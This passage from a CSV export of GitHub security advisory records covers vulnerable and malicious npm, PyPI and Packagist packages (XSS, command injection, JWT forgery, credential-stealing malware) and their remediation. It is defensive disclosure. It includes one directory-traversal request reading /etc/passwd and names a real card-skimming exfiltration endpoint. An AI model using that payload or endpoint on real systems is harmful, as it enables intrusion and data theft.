+[Cross-site Scripting (XSS) - Stored (CWE-79)](https://cwe.mitre.org/data/definitions/79.html)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/contactform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.1'}, {'fixed': '4.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/contactform/security/advisories/GHSA-95hx-62rh-gg96'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15178'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/contactform/commit/a1da814bea7e5750b858a2dbbc58ace80379f42f'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/contactform/commit/ecd9f5d14920ec00885766a7cb41bcc5ed8bfa09'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/contactform'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/prestashop/contactform'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-15T17:33:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jfcc-rm7f-xgf8,2021-09-29T18:37:46Z,2020-09-03T20:36:35Z,,[],Cross-Site Scripting in mavon-editor,"All versions of `mavon-editor` are vulnerable to Cross-Site Scripting. The package fails to sanitize entered input, allowing attackers to execute arbitrary JavaScript in a victim's browser.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'mavon-editor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hinesboy/mavonEditor/issues/472'}, {'type': 'WEB', 'url': 'https://github.com/hinesboy/mavonEditor/pull/548'}, {'type': 'WEB', 'url': 'https://github.com/hinesboy/mavonEditor/commit/5592ec3761bd3b5a12ba6f99ce3c4057c6e33f72'}, {'type': 'PACKAGE', 'url': 'https://github.com/hinesboy/mavonEditor'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MAVONEDITOR-459108'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1169'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/mavon-editor'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:49:47Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gjcw-v447-2w7q,2021-09-23T21:25:33Z,2020-09-01T15:23:18Z,,['CVE-2016-1000223'],Forgeable Public/Private Tokens in jws,"Affected versions of the `jws` package allow users to select what algorithm the server will use to verify a provided JWT. A malicious actor can use this behaviour to arbitrarily modify the contents of a JWT while still passing verification. For the common use case of the JWT as a bearer token, the end result is a complete authentication bypass with minimal effort.
+
+
+
+
+## Recommendation
+
+Update to version 3.0.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jws'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000223'}, {'type': 'WEB', 'url': 'https://github.com/brianloveswords/node-jws/commit/585d0e1e97b6747c10cf5b7689ccc5618a89b299#diff-4ac32a78649ca5bdd8e0ba38b7006a1e'}, {'type': 'WEB', 'url': 'https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/'}, {'type': 'PACKAGE', 'url': 'https://github.com/brianloveswords/node-jws'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:jws:20160726'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/88'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:10:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j67m-jg9p-ppg4,2021-10-01T16:10:45Z,2020-09-03T23:18:05Z,,[],Malicious Package in ns-sha3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ns-sha3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1298'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jjgw-jf33-7fg9,2023-09-12T19:36:07Z,2020-09-01T18:22:48Z,,['CVE-2017-16193'],Directory Traversal in mfrs,"Affected versions of `mfrs` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'mfrs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16193'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/mfrs'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/437'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:23:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wqhw-frpx-5mmp,2020-08-31T18:36:09Z,2020-09-02T16:01:33Z,,[],Command Injection in tomato,"All versions of `tomato` are vulnerable to Command Injection. The /api/exec endpoint does not validate user input allowing attackers to run arbitrary commands in the system.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'tomato'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/797'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:36:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7543-mr7h-6v86,2021-09-27T16:15:52Z,2020-09-02T16:00:26Z,,[],Improper Authorization in googleapis,"Versions of `googleapis` prior to 39.1.0 are vulnerable to Improper Authorization. Setting credentials to one client may apply to all clients which may cause requests to be sent with the incorrect credentials.
+
+
+## Recommendation
+
+Upgrade to version 39.1.0.",[],"[{'package': {'ecosystem': 'npm', 'name': 'googleapis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '39.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/googleapis/google-api-nodejs-client/issues/1594'}, {'type': 'PACKAGE', 'url': 'https://github.com/googleapis/google-api-nodejs-client'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/791'}]","{'cwe_ids': ['CWE-285'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:35:54Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j3g2-m5jj-6336,2020-08-31T18:09:51Z,2020-09-01T15:20:00Z,,['CVE-2015-9243'],Unsafe Merging of CORS Configuration Conflict in hapi,"Versions of `hapi` prior to 11.1.4 are affected by a vulnerability that causes route-level CORS configuration to override connection-level or server-level CORS defaults. This may result in a situation where CORS permissions are less restrictive than intended.
+
+
+
+
+## Recommendation
+
+Update hapi to version 11.1.4 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'hapi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '11.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-9243'}, {'type': 'WEB', 'url': 'https://github.com/hapijs/hapi/issues/2980'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/65'}]","{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:09:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wgvj-6v57-wjh3,2021-09-30T21:37:06Z,2020-09-02T21:30:14Z,,[],Malicious Package in bowee,"Version 1.8.4 of `bowee` contained malicious code as a preinstall script. The package downloaded a file from a remote server, executed it and opened a backdoor.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bowee'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/897'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:39:45Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f8mr-jv2c-v8mg,2021-11-19T15:27:56Z,2020-09-09T17:29:27Z,,['CVE-2020-15163'],Invalid root may become trusted root in The Update Framework (TUF),"### Impact
+The Python TUF reference implementation `tuf<0.12` will incorrectly trust a previously downloaded root metadata file which failed verification at download time. This allows an attacker who is able to serve multiple new versions of root metadata (i.e. by a man-in-the-middle attack) culminating in a version which has not been correctly signed to control the trust chain for future updates.
+
+While investigating the reported vulnerability, we discovered that the detailed client workflow was not fully implemented. Specifically, for step 1.3 the newly downloaded root metadata was not being verified with a threshold of keys specified in the new root metadata file.
+This missing step of the client workflow has been implemented in [PR #1101](https://github.com/theupdateframework/tuf/pull/1101), which is included in [v0.14.0](https://github.com/theupdateframework/tuf/releases/tag/v0.14.0) of tuf.
+
+### Patches
+A [fix](https://github.com/theupdateframework/tuf/pull/885), is available in version [0.12](https://github.com/theupdateframework/tuf/releases/tag/v0.12.0) and newer.
+
+### Workarounds
+No workarounds are known for this issue.
+
+### References
+* Pull request resolving the invalid root becoming trusted issue [PR 885](https://github.com/theupdateframework/tuf/pull/885)
+* Pull request implementing self verification of newly downloaded root metadata [PR 1101](https://github.com/theupdateframework/tuf/pull/1101)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tuf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/theupdateframework/tuf/security/advisories/GHSA-f8mr-jv2c-v8mg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15163'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/tuf/pull/885'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/tuf/commit/3d342e648fbacdf43a13d7ba8886aaaf07334af7'}, {'type': 'PACKAGE', 'url': 'https://github.com/theupdateframework/tuf'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/tuf/releases/tag/v0.12.0'}, {'type': 'WEB', 'url': 'https://pypi.org/project/tuf'}]","{'cwe_ids': ['CWE-345', 'CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-09T17:27:31Z', 'nvd_published_at': '2020-09-09T18:15:00Z'}"
+1.4.0,GHSA-49mg-94fc-2fx6,2020-08-31T19:00:00Z,2020-09-04T17:32:49Z,,[],Command Injection in npm-git-publish,"All versions of `npm-git-publish` are vulnerable to Command Injection. The package fails to sanitize input and passes it directly to an `execSync` call, which may allow attackers to execute arbitrary code in the system. The `publish` function is vulnerable through the `gitRemoteUrl` variable.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'npm-git-publish'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/730121'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1458'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:00Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pc7q-c837-3wjq,2021-10-04T15:56:21Z,2020-09-03T17:02:58Z,,[],Malicious Package in wallet-address-validtaor,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'wallet-address-validtaor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1413'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:26Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f64g-whxf-w8f2,2021-09-29T20:56:59Z,2020-09-03T21:44:06Z,,[],Malicious Package in buffar-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffar-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1236'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m7xv-7p93-g6q8,2023-07-27T20:05:00Z,2020-09-03T00:35:35Z,,[],Malicious Package in libubx,"Version 1.0.3 of `libubx` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 1.0.2",[],"[{'package': {'ecosystem': 'npm', 'name': 'libubx'}, 'versions': ['1.0.3']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/938'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mq9h-cwc2-6j5r,2021-09-30T19:50:21Z,2020-09-03T17:42:27Z,,[],Malicious Package in midway-dataproxy,"All versions of `midway-dataproxy` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'midway-dataproxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1056'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mhxg-pr3j-v9gr,2021-10-01T20:59:03Z,2020-09-03T19:41:22Z,,[],Malicious Package in colne,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'colne'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1386'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:23Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g336-c7wv-8hp3,2021-09-23T21:35:43Z,2020-09-01T15:58:06Z,,[],Cross-Site Scripting in swagger-ui,"Affected versions of `swagger-ui` are vulnerable to cross-site scripting via the `url` query string parameter.
+
+
+## Recommendation
+
+Update to 2.2.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'swagger-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/issues/1617'}, {'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/commit/a1aea70f2c64533bf053a41d4da5a8accd0117b7'}, {'type': 'PACKAGE', 'url': 'https://github.com/swagger-api/swagger-ui'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/137'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:12:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h5vm-jhq7-w647,2021-10-01T14:01:26Z,2020-09-02T20:17:13Z,,[],Malicious Package in momen,"All versions of `momen` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'momen'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/849'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:04Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gqf6-75v8-vr26,2020-08-31T18:58:56Z,2020-09-04T16:56:11Z,,[],Arbitrary File Write in bin-links,"Versions of `bin-links` prior to 1.1.5 are vulnerable to an Arbitrary File Write. The package fails to restrict access to folders outside of the intended `node_modules` folder through the `bin` field. This allows attackers to create arbitrary files in the system. Note it is not possible to overwrite files that already exist.
+
+
+## Recommendation
+
+Upgrade to version 1.1.5 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'bin-links'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.5'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1427'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:56Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gvm7-8fq3-qjj2,2021-10-01T20:50:15Z,2020-09-03T19:43:18Z,,[],Malicious Package in bs85,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bs85'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1378'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:04Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9p64-h5q4-phpm,2020-08-31T18:34:44Z,2020-09-02T15:44:58Z,,[],Remote Code Execution in office-converter,"All versions of `office-converter` are vulnerable to Remote Code Execution. Due to insufficient input validation an attacker could run arbitrary commands on the server thus rendering the package vulnerable to Remote Code Execution.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'office-converter'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/759'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:34:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-84qj-9qf2-q92r,2023-07-13T21:06:36Z,2020-09-03T00:32:30Z,,[],Malicious Package in pm-controls,"Version 1.1.8 of `pm-controls` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised. Users may downgrade to 1.1.7",[],"[{'package': {'ecosystem': 'npm', 'name': 'pm-controls'}, 'versions': ['1.1.8']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/949'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-crfh-jmv2-2f9v,2021-10-04T15:43:43Z,2020-09-03T17:03:11Z,,[],Malicious Package in singale,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'singale'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1411'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hvxq-j2r4-4jm8,2020-08-31T18:49:33Z,2020-09-03T20:31:04Z,,[],Regular Expression Denial of Service in sql-injection,"All versions of `sql-injection` are vulnerable to Regular Expression Denial of Service. The package processes a request's body with regular expressions that may take exponentially longer to execute for large inputs.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'sql-injection'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1163'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:49:33Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8mgg-5x65-m4m4,2020-08-31T18:41:59Z,2020-09-11T21:08:19Z,,[],Command Injection in soletta-dev-app,"All versions of `soletta-dev-app` are vulnerable to Command Injection. The package does not validate user input on the `/api/service/status` API endpoint, passing contents of the `service` query parameter to an exec call. This may allow attackers to run arbitrary commands in the system.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'soletta-dev-app'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/958'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wqgq-mfvj-6qxp,2021-09-30T20:19:47Z,2020-09-03T19:49:03Z,,[],Malicious Package in koa-body-parse,"This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no indications of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'koa-body-parse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1131'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p8fm-w787-x6x3,2021-10-01T13:42:27Z,2020-09-02T15:50:28Z,,[],Malicious Package in portionfatty12,"All versions of `portionfatty12` are considered malicious. The package is malware designed to steal user's data. When installed it uploads the user's public SSH keys to a remote server.
+
+
+## Recommendation
+
+This package is not available on the npm Registry anymore. If you happen to find this package in your environment you should consider the system it was installed on compromised and assess if further response (such as rotating all credentials found on the compromised machine) is necessary.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'portionfatty12'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/765'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:34:55Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c7pp-g2v2-2766,2021-09-23T21:31:53Z,2020-09-01T15:32:04Z,,['CVE-2016-1000228'],DOM-based XSS in gmail-js,"Affected versions of `gmail-js` are vulnerable to cross-site scripting in the `tools.parse_response`, `helper.get.visible_emails_post`, and `helper.get.email_data_post` functions, which pass user input directly into the Function constructor.
+
+
+
+## Recommendation
+
+Update to version 0.6.5 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'gmail-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.6.4'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000228'}, {'type': 'WEB', 'url': 'https://github.com/KartikTalwar/gmail.js/issues/281'}, {'type': 'WEB', 'url': 'https://github.com/KartikTalwar/gmail.js/commit/a83436f499f9c01b04280af945a5a81137b6baf1'}, {'type': 'PACKAGE', 'url': 'https://github.com/KartikTalwar/gmail.js'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/125'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:11:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5jgp-pg4f-q8vj,2021-09-30T20:27:21Z,2020-09-03T19:55:42Z,,[],Malicious Package in node-ftp,"This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
+
+
+## Recommendation
+
